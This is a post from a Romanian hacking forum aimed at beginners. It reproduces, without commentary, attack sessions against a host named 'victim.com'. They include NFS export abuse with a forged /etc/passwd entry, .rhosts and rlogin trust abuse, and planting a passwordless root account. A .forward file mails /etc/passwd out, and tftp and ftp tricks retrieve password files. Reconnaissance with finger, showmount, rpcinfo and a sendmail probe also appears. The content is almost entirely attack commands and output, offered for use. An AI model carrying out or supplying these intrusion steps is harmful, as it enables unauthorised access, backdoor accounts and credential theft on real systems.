Bine ati venit pe HackTeam Forum !
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe in consecinta ,tutoriale . In acelasi timp aici veti gasi si asistenta help in materie corespunzatoare . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile pe care le savarsiti . || SS-TEAM || Va Multumeste pt vizita !
Lista Forumurilor Pe Tematici
Bine ati venit pe HackTeam Forum ! | Reguli | Inregistrare | Login

POZE BINE ATI VENIT PE HACKTEAM FORUM !

Nu sunteti logat.
Nou pe simpatie:
Ela 22 Cluj din Cluj
Femeie
22 ani
Cluj
cauta Barbat
22 - 48 ani
Bine ati venit pe HackTeam Forum ! / Linux - Hacking ! / vulnerabilitati linux pt.ancepatori  
Autor
Mesaj Pagini: 1
carter
Membru nou

Inregistrat: acum 19 ani
Postari: 15
victim % finger @victim.com
[victim.com]
Login       Name             TTY Idle     When    Where
zen      Dr.  Fubar           co   1d  Wed 08:00   death.com
*********************************************************************
For instance, running showmount on your target reveals:

evil % showmount -e victim.com
export list for victim.com:
/export                            (everyone)
/var                               (everyone)
/usr                               easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy                  easy
/export/swap/easy                  easy
***********************************************************************

evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
    1 drwxr-xr-x 11 root     daemon        512 Jun 19 09:47 .
    1 drwxr-xr-x  7 root     wheel         512 Jul 19  1991 ..
    1 drwx--x--x  9 10001    daemon       1024 Aug  3 15:49 guest
evil # echo guest:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
    1 drwxr-xr-x 11 root     daemon        512 Jun 19 09:47 .
    1 drwxr-xr-x  7 root     wheel         512 Jul 19  1991 ..
    1 drwx--x--x  9 guest    daemon       1024 Aug  3 15:49 guest
evil # su guest
evil % echo victim.com >> guest/.rhosts
evil % rlogin victim.com
         Welcome to victim.com!
victim %
***********************************************************************

evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim %  ls -ldg /etc
drwxr-sr-x  8 bin      staff        2048 Jul 24 18:02 /etc
victim %  cd /etc
victim %  mv passwd pw.old
victim %  (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
         Welcome to victim.com!
victim #
***********************************************************************
evil % cat forward_sucker_file
"|/bin/mail < /etc/passwd"

evil % ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -lga
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
total 5
drwxr-xr-x  4 101      1             512 Jun 20  1991 .
drwxr-xr-x  4 101      1             512 Jun 20  1991 ..
drwxr-xr-x  2 0        1             512 Jun 20  1991 bin
drwxr-xr-x  2 0        1             512 Jun 20  1991 etc
drwxr-xr-x  3 101      1             512 Aug 22  1991 pub
226 ASCII Transfer complete.
242 bytes received in 0.066 seconds (3.6 Kbytes/s)
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
evil % echo test | mail
***********************************************************************
% ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)
**********************************************************************
evil % tftp
tftp> connect victim.com
tftp> get /etc/passwd /tmp/passwd.victim
tftp> quit
***********************************************************************

evil % rpcinfo -p victim.com    [output trimmed for brevity's sake]
    program vers proto   port
     100004    2   tcp    673  ypserv
     100005    1   udp    721  mountd
     100003    2   udp   2049  nfs
     100026    1   udp    733  bootparam
     100017    1   tcp   1274  rexd
***********************************************************************
evil % ypwhich -d victim victim.com
Domain victim not bound.
***********************************************************************
evil % tcpmap victim.com
Mapping 128.128.128.1
port 21: ftp
port 23: telnet
port 25: smtp
port 37: time
port 79: finger
port 512: exec
port 513: login
port 514: shell
port 515: printer
port 6000: (X)
***********************************************************************
evil % telnet victim.com 25
connecting to host victim.com (128.128.128.1.), port 25
connection open
220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit
***********************************************************************

mai adaugati si voi  daca mai  aveti de adaugat ceva 


_______________________________________
email

pus acum 17 ani
   
Pagini: 1  

Mergi la